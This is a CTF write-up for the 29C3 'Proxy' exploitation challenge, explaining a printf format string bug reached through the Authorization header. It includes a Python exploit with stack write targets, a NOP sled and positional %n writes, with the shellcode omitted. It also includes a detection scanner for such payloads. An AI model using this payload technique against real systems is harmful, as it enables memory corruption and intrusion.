29C3 CTF Exploitation 400 Proxy

Hellok and I worked on this challenge for quite a long time. We failed to solve it, although we did exploit the format string vulnerability successfully.

We spent a lot of time looking for ways to bypass the PAM authentication and neglected the fairly obvious format string vulnerability.

Let's first look at the stack layout:

(Image: proxy_stack, the stack layout of the vulnerable function)

We can see that the lowest 3 bytes of the pointer "format" will be overwritten.

(Image: proxy_exploit2, the vulnerable printf call)

The format string vulnerability is here.

(Image: proxy_exploit, the exploit running against the proxy)

To exploit this format string, we first leak some stack addresses using the "%x" format of printf. The exploit code (Python 2) is as follows:

import socket
import time
import base64
import random
import struct

# We tried several 71-byte shellcodes and succeeded in our local environment.
# The shellcode itself is not reproduced in this writeup; the placeholder keeps the script syntactically valid.
shellcode = ""  # placeholder: 71-byte shellcode omitted

IP = "94.45.252.240"
PORT = 1024

buf = 'GET '
buf += '/'
buf += ' HTTP/1.1'
buf += 'Authorization: Basic '
authkey = base64.b64encode('n:1')
buf += authkey
# Four stack addresses (0xbffff778..0xbffff77b), one byte apart, used as the targets of the %n writes below
buf += "a\x78\xf7\xff\xbf\x79\xf7\xff\xbf\x7a\xf7\xff\xbf\x7b\xf7\xff\xbf"
buf += "\x90" * 250          # NOP sled
buf += shellcode
buf += "\x90" * 50
# Byte-by-byte %n writes: each %Nx pads the output so the running byte count equals the byte to write
buf += "%117x%165$n%253x%166$n%10x%167$n%192x%168$n"
buf += "." * (508 - len(buf))  # pad to a fixed offset of 508 bytes
buf += "\x94\xf5"              # overwrites the low bytes of the "format" pointer
print "*****************"
print "authkey len = ", len(authkey)
print "buf len = ", len(buf)

s = socket.socket()
s.connect((IP, PORT))
s.send(buf)
print s.recv(10000)

We didn't understand SECCOMP_FILTER well, so we failed to execute the shellcode on the remote server. According to other writeups, the key is hidden in the proxy's cache and can easily be read out using the "%s" format of printf.
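The request above puts printf directives ("%x", "%s", positional "%N$n" writes) straight into the Authorization header, which is what the proxy would have had to reject before passing the header to printf. As an added example (not code from the writeup), the scanner below parses printf-style directives out of untrusted request bytes and summarises what they would do: how many values would be read from the stack, how many "%n" writes would occur and at which argument positions, how much padding the width fields consume, and whether the data carries a long 0x90 run. The two sample requests are constructed here for illustration; the hostile one reuses the directive string from the exploit above, and the thresholds in inspect_request are assumptions.

```python
import base64
import re

# One printf-style conversion: optional positional "N$", flags, width,
# precision, length modifier, conversion character.
DIRECTIVE = re.compile(
    rb"%(?:(\d+)\$)?[-+ #0]*(\d*)(?:\.\d+)?(?:hh|h|ll|l|q|j|z|t|L)?([diouxXeEfgGaAcspn%])"
)

# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    b"GET / HTTP/1.1\r\nHost: proxy.example\r\nAuthorization: Basic "
    + base64.b64encode(b"alice:s3cret")
    + b"\r\n\r\n"
)
HOSTILE_REQUEST = (
    b"GET / HTTP/1.1\r\nAuthorization: Basic "
    + base64.b64encode(b"n:1")
    + b"a\x78\xf7\xff\xbf\x79\xf7\xff\xbf"   # write targets, as in the writeup
    + b"\x90" * 32                           # NOP sled
    + b"%117x%165$n%253x%166$n%10x%167$n%192x%168$n"  # directive string from the exploit
    + b"\r\n\r\n"
)


def scan_format_directives(data):
    """Summarise printf directives found in untrusted bytes."""
    reads = writes = padding = 0
    positions = []
    for m in DIRECTIVE.finditer(data):
        pos, width, conv = m.group(1), m.group(2), m.group(3)
        if conv == b"%":          # "%%" is a literal percent sign, harmless
            continue
        if conv == b"n":          # %n writes the running byte count to memory
            writes += 1
        else:                     # every other conversion consumes a stack argument
            reads += 1
        if pos:                   # explicit argument index, e.g. %165$n
            positions.append(int(pos))
        if width:                 # width fields inflate the byte count %n will write
            padding += int(width)
    return {"reads": reads, "writes": writes, "positions": positions, "padding": padding}


def longest_run(data, value):
    """Length of the longest run of one byte value (used to spot NOP sleds)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def inspect_request(raw):
    """Scan a raw request and flag it if it looks like a format string payload."""
    summary = scan_format_directives(raw)
    summary["nop_sled"] = longest_run(raw, 0x90)
    # Thresholds are assumptions for this example: any %n, any positional
    # argument, three or more stack reads, or a 16+ byte NOP run is flagged.
    summary["suspicious"] = (
        summary["writes"] > 0
        or bool(summary["positions"])
        or summary["reads"] >= 3
        or summary["nop_sled"] >= 16
    )
    return summary


if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("hostile", HOSTILE_REQUEST)):
        print(name, inspect_request(req))
```

For the hostile sample the summary reports four stack reads, four "%n" writes at positions 165 to 168 and 572 bytes of padding; the benign Basic-auth request produces no directives at all, which is the check a proxy should make before a header ever reaches printf (or, better, the header should only ever be printed through a fixed "%s" format).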